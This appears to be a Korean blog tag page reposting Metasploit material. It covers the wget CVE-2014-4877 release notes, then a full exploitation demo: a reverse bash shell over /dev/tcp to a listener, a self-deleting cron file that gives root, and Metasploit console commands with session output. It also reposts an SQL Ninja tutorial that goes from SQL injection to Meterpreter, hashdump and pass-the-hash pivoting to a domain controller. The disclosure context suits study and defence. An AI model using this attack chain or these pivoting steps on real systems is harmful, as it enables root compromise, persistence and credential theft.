'metasploit'에 해당되는 글 17건

  1. 2014.10.31 Wget FTP Symlink Attack Vulnerability
  2. 2013.12.30 How to install Metasploitable 2 in Virtual Box
  3. 2012.07.24 SQL Injection with SQL Ninja and Metasploit Hacking Tutorial
2014.10.31 18:03

Wget FTP Symlink Attack Vulnerability

http://thehackernews.com/2014/10/cve-2014-4877-wget-ftp-symlink-attack.html


[Bug-wget] GNU wget 1.16 released

It is available for download here:

ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.gz
ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.xz

and the GPG detached signatures using the key E163E1EA:

ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.gz.sig
ftp://ftp.gnu.org/gnu/wget/wget-1.16.tar.xz.sig

To reduce load on the main server, you can use this redirector service
which automatically redirects you to a mirror:

http://ftpmirror.gnu.org/wget/wget-1.16.tar.gz
http://ftpmirror.gnu.org/wget/wget-1.16.tar.xz

* Noteworthy changes in Wget 1.16

** No longer create local symbolic links by default.  Closes CVE-2014-4877.

** Use libpsl for verifying cookie domains.

** Default progress bar output changed.

** Introduce --show-progress to force display the progress bar.

** Introduce --no-config.  The wgetrc files will not be read.

** Introduce --start-pos to allow starting downloads from a specified position.

** Fix a problem with ISA Server Proxy and keep-alive connections.


"In addition to changing arguments in all scripts or programs that invoke wget, it is possible to enabled[sic] retr-symlinks option via wget configuration file - either global /etc/wgetrc, or user specific ~/.wgetrc - by adding the line: retr-symlinks=on"



Exploitation

 

We have released a Metasploit module to demonstrate this issue. In the example below, we demonstrate obtaining a reverse command shell against a user running wget as root against a malicious FTP service. This example makes use of the cron daemon and a reverse-connect bash shell. First we will create a reverse connect command string using msfpayload.

 

msfpayload cmd/unix/reverse_bash LHOST=192.168.0.4 LPORT=4444 R

0<&112-;exec 112<>/dev/tcp/192.168.0.4/4444;sh <&112 >&112 2>&112

 

Next we create a crontab file that runs once a minute, launches this command, and deletes itself:

 

cat>cronshell <<EOD

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

* * * * * root bash -c '0<&112-;exec 112<>/dev/tcp/192.168.0.4/4444;sh <&112 >&112 2>&112'; rm -f /etc/cron.d/cronshell

EOD

 

Now we start up msfconsole and configure a shell listener:

 

msfconsole

msf> use exploit/multi/handler

msf exploit(handler) > set PAYLOAD cmd/unix/reverse_bash

msf exploit(handler) > set LHOST 192.168.0.4

msf exploit(handler) > set LPORT 4444

msf exploit(handler) > run -j

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.4:4444

 

Finally we switch to the wget module itself:

 

msf exploit(handler) > use auxiliary/server/wget_symlink_file_write

msf auxiliary(wget_symlink_file_write) > set TARGET_FILE /etc/cron.d/cronshell

msf auxiliary(wget_symlink_file_write) > set TARGET_DATA file:cronshell

msf auxiliary(wget_symlink_file_write) > set SRVPORT 21

msf auxiliary(wget_symlink_file_write) > run

[+] Targets should run: $ wget -m ftp://192.168.0.4:21/

[*] Server started.

 

At this point, we just wait for the target user to run wget -m ftp://192.168.0.4:21/

 

[*] 192.168.0.2:52251 Logged in with user 'anonymous' and password 'anonymous'...

[*] 192.168.0.2:52251 -> LIST -a

[*] 192.168.0.2:52251 -> CWD /1X9ftwhI7G1ENa

[*] 192.168.0.2:52251 -> LIST -a

[*] 192.168.0.2:52251 -> RETR cronshell

[+] 192.168.0.2:52251 Hopefully wrote 186 bytes to /etc/cron.d/cronshell

[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.2:58498) at 2014-10-27 23:19:02 -0500

 

 

msf auxiliary(wget_symlink_file_write) > sessions -i 1

[*] Starting interaction with 1...

 

id

uid=0(root) gid=0(root) groups=0(root),1001(rvm)


Trackback 0 Comment 0
2013.12.30 16:12

How to install Metasploitable 2 in Virtual Box



출처 : https://www.facebook.com/groups/metasploit/


Trackback 0 Comment 0
2012.07.24 18:12

SQL Injection with SQL Ninja and Metasploit Hacking Tutorial



In this blog I will show you a pretty sweet tool called SQL Ninja in the Metasploit Framework. There are a lot of SQL injection tools out there but this one is my favorite because instead of extracting the actual data it focuses on getting a interactive shell on the remote DB server, and uses it as a foothold against the target network.  So let’s go ahead and dive in to the wonders of SQL Ninja.

First all of the information we need SQL Ninja to use is stored in a config file by default it’s called sqlninja.conf. All you need to do is simply open the configuration file with Nano, Kate or whatever your favorite text editor in Linux is. (See Below)

As you can see from the screenshot above I pointed out the important parts of the config file for basic SQL injections. The first arrow is the actual host address ie. www.domain.com this can also be an IP address of the server.

The second arrow is the port that we will try to exploit on 443 is the default for SQL so just leave it as 443. Make all the changes needed to the config file and save it.

Now type: “cd /pentest/database/sqlninja” without quotes and hit enter this will load up the SQL Ninja tool, after that type: “./sqlninja –f config.conf –m m” without quotes this is going to parse the config file into SQL Ninja and also start up a Metasploit module at the same time.

After you do this it’s going to take awhile because SQL Ninja is actually pushing SQL queries via the initial SQL injection. So it has to go through several queries and then wait for the responses from the SQL server and then check the those results. I would advise grabbing  a rum and coke while you wait :) When it’s done you will get a screen like the one below:

This has created a local shell on the SQL box from here you can use your Metasploit meterpreter session, this is pretty awesome because a SQL server is usually a high maintenance server, so it’s likely the admin has logged in recently. We can do something like a hashdump or grab the tokens off the local SQL server once we have the hashes of all the accounts (Admin included) we can use the hash  to pivot from the SQL server into the domain controller. This technique is known as “Pass The Hash” and works if the admin uses the same password for all his logins to windows servers.

Final Note: The best lab for this is a virtual environment I like to use VMWare Workstation to run all the different boxes needed for the demos.



출처 : http://www.elithecomputerguy.com/



Trackback 0 Comment 0